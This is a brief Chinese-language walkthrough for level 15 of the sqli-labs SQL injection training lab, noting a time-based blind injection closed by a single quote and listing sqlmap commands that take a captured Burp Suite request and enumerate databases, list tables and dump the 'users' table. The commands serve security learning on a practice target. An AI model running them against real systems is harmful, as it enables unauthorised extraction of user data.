本关属于时间注入,基于源码分析,闭合字符是单引号。
由于过程较复杂,这里使用sqlmap跑数据
1.先用工具burpsuite15将sqli-labs15关的数据复制到文件,修改文件名:1.txt
2.使用sqlmap工具跑一下,输入python sqlmap.py -r 1.txt --dbs,跑出所有数据库
3.输入python sqlmap.py -r 1.txt -D security --tables,跑出security的全部表
4.输入python sqlmap.py -r 1.txt -D security -T users --dump,跑出users表所有数据
这样我们就跑完了所有数据